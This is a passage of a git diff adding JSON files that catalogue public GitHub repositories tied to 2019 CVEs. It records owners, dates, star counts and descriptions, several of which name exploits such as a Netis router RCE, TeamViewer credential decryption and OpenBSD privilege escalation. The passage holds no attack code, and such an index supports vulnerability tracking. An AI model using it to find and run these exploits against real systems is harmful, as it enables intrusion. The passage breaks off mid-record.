a/2019/CVE-2019-18988.json b/2019/CVE-2019-18988.json new file mode 100644 index 0000000000..c2fda80f30 --- /dev/null +++ b/2019/CVE-2019-18988.json @@ -0,0 +1,64 @@ +[ + { + "id": 276340960, + "name": "CVE-2019-18988", + "full_name": "reversebrain\/CVE-2019-18988", + "owner": { + "login": "reversebrain", + "id": 8024261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8024261?v=4", + "html_url": "https:\/\/github.com\/reversebrain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reversebrain\/CVE-2019-18988", + "description": null, + "fork": false, + "created_at": "2020-07-01T09:56:29Z", + "updated_at": "2021-10-29T06:37:37Z", + "pushed_at": "2020-07-01T10:03:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 279341511, + "name": "CVE-2019-18988", + "full_name": "mr-r3b00t\/CVE-2019-18988", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2019-18988", + "description": "TeamViewer Store Credentials Decryption", + "fork": false, + "created_at": "2020-07-13T15:30:02Z", + "updated_at": "2024-08-12T20:03:41Z", + "pushed_at": "2020-07-13T15:30:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19012.json b/2019/CVE-2019-19012.json new file mode 100644 index 0000000000..0561f3af6c --- /dev/null +++ b/2019/CVE-2019-19012.json @@ -0,0 +1,64 @@ +[ + { + "id": 222906322, + "name": "CVE-2019-19012", + "full_name": "ManhNDd\/CVE-2019-19012", + "owner": { + "login": "ManhNDd", + "id": 18594865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18594865?v=4", + "html_url": "https:\/\/github.com\/ManhNDd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ManhNDd\/CVE-2019-19012", + "description": "Integer overflow in Oniguruma", + "fork": false, + "created_at": "2019-11-20T10:00:18Z", + "updated_at": "2024-04-21T08:33:58Z", + "pushed_at": "2019-11-20T15:53:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 222956814, + "name": "CVE-2019-19012", + "full_name": "tarantula-team\/CVE-2019-19012", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-19012", + "description": "An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read", + "fork": false, + "created_at": "2019-11-20T14:32:23Z", + "updated_at": "2019-11-20T15:24:36Z", + "pushed_at": "2019-11-20T15:24:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19030.json b/2019/CVE-2019-19030.json new file mode 100644 index 0000000000..6ed2eafcf9 --- /dev/null +++ b/2019/CVE-2019-19030.json @@ -0,0 +1,33 @@ +[ + { + "id": 814126257, + "name": "boatcrash", + "full_name": "shodanwashere\/boatcrash", + "owner": { + "login": "shodanwashere", + "id": 74769749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74769749?v=4", + "html_url": "https:\/\/github.com\/shodanwashere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shodanwashere\/boatcrash", + "description": "Exploit for CVE-2019-19030 that affects Harbor versions <1.10.3 and <2.0.1. Can also be used to enumerate and pull public projects from higher versions.", + "fork": false, + "created_at": "2024-06-12T11:46:57Z", + "updated_at": "2024-08-29T11:44:02Z", + "pushed_at": "2024-08-29T11:43:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19033.json b/2019/CVE-2019-19033.json new file mode 100644 index 0000000000..03ba4049ef --- /dev/null +++ b/2019/CVE-2019-19033.json @@ -0,0 +1,39 @@ +[ + { + "id": 222300876, + "name": "CVE-2019-19033", + "full_name": "ricardojoserf\/CVE-2019-19033", + "owner": { + "login": "ricardojoserf", + "id": 11477353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11477353?v=4", + "html_url": "https:\/\/github.com\/ricardojoserf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ricardojoserf\/CVE-2019-19033", + "description": "CVE-2019-19033 description and scripts to check the vulnerability in Jalios JCMS 10 (Authentication Bypass)", + "fork": false, + "created_at": "2019-11-17T19:32:10Z", + "updated_at": "2024-08-12T19:54:56Z", + "pushed_at": "2019-12-03T19:22:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-19033", + "jalios", + "vulnerability", + "webdav" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19194.json b/2019/CVE-2019-19194.json new file mode 100644 index 0000000000..b68c191d5e --- /dev/null +++ b/2019/CVE-2019-19194.json @@ -0,0 +1,33 @@ +[ + { + "id": 638485429, + "name": "writeup-cve-2019-19194", + "full_name": "louisabricot\/writeup-cve-2019-19194", + "owner": { + "login": "louisabricot", + "id": 45848751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45848751?v=4", + "html_url": "https:\/\/github.com\/louisabricot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louisabricot\/writeup-cve-2019-19194", + "description": "A writeup and theoretical Proof-of-Concept for CVE-2019-19194", + "fork": false, + "created_at": "2023-05-09T13:12:44Z", + "updated_at": "2023-05-16T07:39:54Z", + "pushed_at": "2023-07-11T16:46:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19203.json b/2019/CVE-2019-19203.json new file mode 100644 index 0000000000..8069eb0f44 --- /dev/null +++ b/2019/CVE-2019-19203.json @@ -0,0 +1,64 @@ +[ + { + "id": 223278825, + "name": "CVE-2019-19203", + "full_name": "ManhNDd\/CVE-2019-19203", + "owner": { + "login": "ManhNDd", + "id": 18594865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18594865?v=4", + "html_url": "https:\/\/github.com\/ManhNDd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ManhNDd\/CVE-2019-19203", + "description": "Heap-buffer-overflow in Oniguruma (function gb18030_mbc_enc_len)", + "fork": false, + "created_at": "2019-11-21T22:43:34Z", + "updated_at": "2024-04-17T11:59:37Z", + "pushed_at": "2019-11-22T00:04:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 229900382, + "name": "CVE-2019-19203", + "full_name": "tarantula-team\/CVE-2019-19203", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-19203", + "description": "An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read", + "fork": false, + "created_at": "2019-12-24T08:11:11Z", + "updated_at": "2019-12-24T08:18:12Z", + "pushed_at": "2019-12-24T08:18:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19204.json b/2019/CVE-2019-19204.json new file mode 100644 index 0000000000..925713b79b --- /dev/null +++ b/2019/CVE-2019-19204.json @@ -0,0 +1,64 @@ +[ + { + "id": 223286619, + "name": "CVE-2019-19204", + "full_name": "ManhNDd\/CVE-2019-19204", + "owner": { + "login": "ManhNDd", + "id": 18594865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18594865?v=4", + "html_url": "https:\/\/github.com\/ManhNDd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ManhNDd\/CVE-2019-19204", + "description": "Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)", + "fork": false, + "created_at": "2019-11-21T23:53:16Z", + "updated_at": "2024-04-17T11:59:49Z", + "pushed_at": "2019-11-22T00:04:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 229901564, + "name": "CVE-2019-19204", + "full_name": "tarantula-team\/CVE-2019-19204", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-19204", + "description": "Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)", + "fork": false, + "created_at": "2019-12-24T08:19:02Z", + "updated_at": "2019-12-24T08:29:30Z", + "pushed_at": "2019-12-24T08:27:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19231.json b/2019/CVE-2019-19231.json new file mode 100644 index 0000000000..1472f5ed23 --- /dev/null +++ b/2019/CVE-2019-19231.json @@ -0,0 +1,33 @@ +[ + { + "id": 229404870, + "name": "CVE-2019-19231", + "full_name": "hessandrew\/CVE-2019-19231", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2019-19231", + "description": "https:\/\/techdocs.broadcom.com\/us\/product-content\/recommended-reading\/security-notices\/CA20191218-01-security-notice-for-ca-client-automation-agent-for-windows.html", + "fork": false, + "created_at": "2019-12-21T09:23:51Z", + "updated_at": "2019-12-22T15:02:16Z", + "pushed_at": "2019-12-21T09:23:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19268.json b/2019/CVE-2019-19268.json new file mode 100644 index 0000000000..dc4c405d5a --- /dev/null +++ b/2019/CVE-2019-19268.json @@ -0,0 +1,33 @@ +[ + { + "id": 223930097, + "name": "CVE-2019-19268", + "full_name": "TheCyberGeek\/CVE-2019-19268", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2019-19268", + "description": "New Found 0-days!", + "fork": false, + "created_at": "2019-11-25T11:14:26Z", + "updated_at": "2024-08-12T19:55:11Z", + "pushed_at": "2019-12-04T10:14:51Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19315.json b/2019/CVE-2019-19315.json new file mode 100644 index 0000000000..136101d280 --- /dev/null +++ b/2019/CVE-2019-19315.json @@ -0,0 +1,33 @@ +[ + { + "id": 228518016, + "name": "mailorder", + "full_name": "monoxgas\/mailorder", + "owner": { + "login": "monoxgas", + "id": 1223016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1223016?v=4", + "html_url": "https:\/\/github.com\/monoxgas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/monoxgas\/mailorder", + "description": "Nalpeiron Licensing Service (NLSSRV32) arbitrary disk read [CVE-2019-19315]", + "fork": false, + "created_at": "2019-12-17T02:41:20Z", + "updated_at": "2019-12-18T02:11:23Z", + "pushed_at": "2019-12-17T03:54:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19356.json b/2019/CVE-2019-19356.json new file mode 100644 index 0000000000..a038a57ca2 --- /dev/null +++ b/2019/CVE-2019-19356.json @@ -0,0 +1,64 @@ +[ + { + "id": 227586233, + "name": "CVE-2019-19356", + "full_name": "shadowgatt\/CVE-2019-19356", + "owner": { + "login": "shadowgatt", + "id": 45848149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45848149?v=4", + "html_url": "https:\/\/github.com\/shadowgatt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadowgatt\/CVE-2019-19356", + "description": "Netis router RCE exploit ( CVE-2019-19356)", + "fork": false, + "created_at": "2019-12-12T11:01:23Z", + "updated_at": "2024-07-16T13:09:32Z", + "pushed_at": "2020-02-10T17:53:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247021488, + "name": "CVE-2019-19356", + "full_name": "qq1515406085\/CVE-2019-19356", + "owner": { + "login": "qq1515406085", + "id": 46200714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46200714?v=4", + "html_url": "https:\/\/github.com\/qq1515406085", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq1515406085\/CVE-2019-19356", + "description": null, + "fork": false, + "created_at": "2020-03-13T08:22:36Z", + "updated_at": "2020-03-13T08:28:35Z", + "pushed_at": "2020-03-13T08:28:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19369.json b/2019/CVE-2019-19369.json new file mode 100644 index 0000000000..be5ec998e2 --- /dev/null +++ b/2019/CVE-2019-19369.json @@ -0,0 +1,33 @@ +[ + { + "id": 235336992, + "name": "CVE-2019-19369", + "full_name": "TheCyberGeek\/CVE-2019-19369", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2019-19369", + "description": null, + "fork": false, + "created_at": "2020-01-21T12:26:00Z", + "updated_at": "2021-02-09T23:37:30Z", + "pushed_at": "2021-02-09T23:37:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19383.json b/2019/CVE-2019-19383.json new file mode 100644 index 0000000000..bab522e4cb --- /dev/null +++ b/2019/CVE-2019-19383.json @@ -0,0 +1,33 @@ +[ + { + "id": 229392465, + "name": "CVE-2019-19383", + "full_name": "killvxk\/CVE-2019-19383", + "owner": { + "login": "killvxk", + "id": 309424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/309424?v=4", + "html_url": "https:\/\/github.com\/killvxk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killvxk\/CVE-2019-19383", + "description": "FreeFTPd 1.0.8 Post-Authentication Buffer Overflow via SIZE", + "fork": false, + "created_at": "2019-12-21T07:20:47Z", + "updated_at": "2021-08-12T19:30:16Z", + "pushed_at": "2019-12-20T09:44:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19393.json b/2019/CVE-2019-19393.json new file mode 100644 index 0000000000..09120dff47 --- /dev/null +++ b/2019/CVE-2019-19393.json @@ -0,0 +1,33 @@ +[ + { + "id": 299963192, + "name": "CVE-2019-19393", + "full_name": "miguelhamal\/CVE-2019-19393", + "owner": { + "login": "miguelhamal", + "id": 35072776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35072776?v=4", + "html_url": "https:\/\/github.com\/miguelhamal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelhamal\/CVE-2019-19393", + "description": null, + "fork": false, + "created_at": "2020-09-30T15:21:48Z", + "updated_at": "2020-10-01T06:13:25Z", + "pushed_at": "2020-09-30T15:58:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19447.json b/2019/CVE-2019-19447.json new file mode 100644 index 0000000000..f2a666a87d --- /dev/null +++ b/2019/CVE-2019-19447.json @@ -0,0 +1,33 @@ +[ + { + "id": 724075085, + "name": "linux-4.19.72_CVE-2019-19447", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2019-19447", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2019-19447", + "description": null, + "fork": false, + "created_at": "2023-11-27T10:49:52Z", + "updated_at": "2023-11-27T10:53:42Z", + "pushed_at": "2023-11-27T10:54:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19470.json b/2019/CVE-2019-19470.json new file mode 100644 index 0000000000..cc03cecc93 --- /dev/null +++ b/2019/CVE-2019-19470.json @@ -0,0 +1,33 @@ +[ + { + "id": 846761065, + "name": "CVE-2019-19470-RedTeamRD", + "full_name": "juliourena\/CVE-2019-19470-RedTeamRD", + "owner": { + "login": "juliourena", + "id": 29603107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29603107?v=4", + "html_url": "https:\/\/github.com\/juliourena", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/juliourena\/CVE-2019-19470-RedTeamRD", + "description": "Este repositorio contiene el código y las instrucciones para replicar el exploit CVE-2019-19470 descubierto por CODEWHITE. Aquí se encuentran el código fuente de los ejemplos que utilicé en el meetup de HackTheBox para explicar mi proceso de aprendizaje y creación de este exploit. ", + "fork": false, + "created_at": "2024-08-23T22:40:58Z", + "updated_at": "2024-08-30T11:13:11Z", + "pushed_at": "2024-08-30T11:13:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19492.json b/2019/CVE-2019-19492.json new file mode 100644 index 0000000000..83fba93974 --- /dev/null +++ b/2019/CVE-2019-19492.json @@ -0,0 +1,95 @@ +[ + { + "id": 644570191, + "name": "CVE-2019-19492", + "full_name": "Chocapikk\/CVE-2019-19492", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2019-19492", + "description": "FreeSWITCH Exploit (CVE-2019-19492)", + "fork": false, + "created_at": "2023-05-23T19:53:54Z", + "updated_at": "2024-08-12T20:31:28Z", + "pushed_at": "2023-05-25T18:48:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 644577238, + "name": "CVE-2019-19492", + "full_name": "tucommenceapousser\/CVE-2019-19492", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2019-19492", + "description": null, + "fork": false, + "created_at": "2023-05-23T20:14:33Z", + "updated_at": "2023-05-23T20:14:53Z", + "pushed_at": "2023-05-23T20:14:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 644620241, + "name": "CVE-2019-19492-2", + "full_name": "tucommenceapousser\/CVE-2019-19492-2", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2019-19492-2", + "description": null, + "fork": false, + "created_at": "2023-05-23T22:56:18Z", + "updated_at": "2023-05-23T22:56:31Z", + "pushed_at": "2023-05-23T22:56:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19511.json b/2019/CVE-2019-19511.json new file mode 100644 index 0000000000..e827a0eae3 --- /dev/null +++ b/2019/CVE-2019-19511.json @@ -0,0 +1,33 @@ +[ + { + "id": 225830647, + "name": "CVE-2019-19511", + "full_name": "jra89\/CVE-2019-19511", + "owner": { + "login": "jra89", + "id": 2511696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2511696?v=4", + "html_url": "https:\/\/github.com\/jra89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jra89\/CVE-2019-19511", + "description": "Chevereto - 1.0.0 Free - 1.1.4 Free, 3.13.4 Core, Remote Code Execution", + "fork": false, + "created_at": "2019-12-04T09:37:29Z", + "updated_at": "2024-08-12T19:55:26Z", + "pushed_at": "2020-01-06T20:24:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19520.json b/2019/CVE-2019-19520.json new file mode 100644 index 0000000000..d74c132802 --- /dev/null +++ b/2019/CVE-2019-19520.json @@ -0,0 +1,33 @@ +[ + { + "id": 314757914, + "name": "Openbsd-Privilege-Escalation", + "full_name": "retrymp3\/Openbsd-Privilege-Escalation", + "owner": { + "login": "retrymp3", + "id": 65720815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65720815?v=4", + "html_url": "https:\/\/github.com\/retrymp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retrymp3\/Openbsd-Privilege-Escalation", + "description": "Script that automates the process of escalating privileges on openbsd system (CVE-2019-19520) by exploiting the xlock binary and againing it's sgid and escalating to the root user by (CVE-2019-19522) exploiting the privileges of auth group and adding keys to the Skey or Yubikey", + "fork": false, + "created_at": "2020-11-21T07:30:10Z", + "updated_at": "2024-02-24T11:42:26Z", + "pushed_at": "2022-02-19T04:11:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19547.json b/2019/CVE-2019-19547.json new file mode 100644 index 0000000000..9b8fc97259 --- /dev/null +++ b/2019/CVE-2019-19547.json @@ -0,0 +1,33 @@ +[ + { + "id": 354340069, + "name": "CVE-2019-19547", + "full_name": "nasbench\/CVE-2019-19547", + "owner": { + "login": "nasbench", + "id": 8741929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8741929?v=4", + "html_url": "https:\/\/github.com\/nasbench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nasbench\/CVE-2019-19547", + "description": "CVE-2019-19547​ POC", + "fork": false, + "created_at": "2021-04-03T16:28:28Z", + "updated_at": "2021-07-04T20:29:42Z", + "pushed_at": "2021-04-03T16:45:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19550.json b/2019/CVE-2019-19550.json new file mode 100644 index 0000000000..40e91816ed --- /dev/null +++ b/2019/CVE-2019-19550.json @@ -0,0 +1,64 @@ +[ + { + "id": 237107989, + "name": "CVE-2019-19550", + "full_name": "underprotection\/CVE-2019-19550", + "owner": { + "login": "underprotection", + "id": 60452208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452208?v=4", + "html_url": "https:\/\/github.com\/underprotection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/underprotection\/CVE-2019-19550", + "description": null, + "fork": false, + "created_at": "2020-01-30T00:11:20Z", + "updated_at": "2020-02-13T17:14:52Z", + "pushed_at": "2020-02-06T15:02:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427766633, + "name": "CVE-2019-19550", + "full_name": "redteambrasil\/CVE-2019-19550", + "owner": { + "login": "redteambrasil", + "id": 24315084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4", + "html_url": "https:\/\/github.com\/redteambrasil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2019-19550", + "description": null, + "fork": false, + "created_at": "2021-11-13T20:32:49Z", + "updated_at": "2021-11-13T20:35:24Z", + "pushed_at": "2021-11-13T20:35:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + 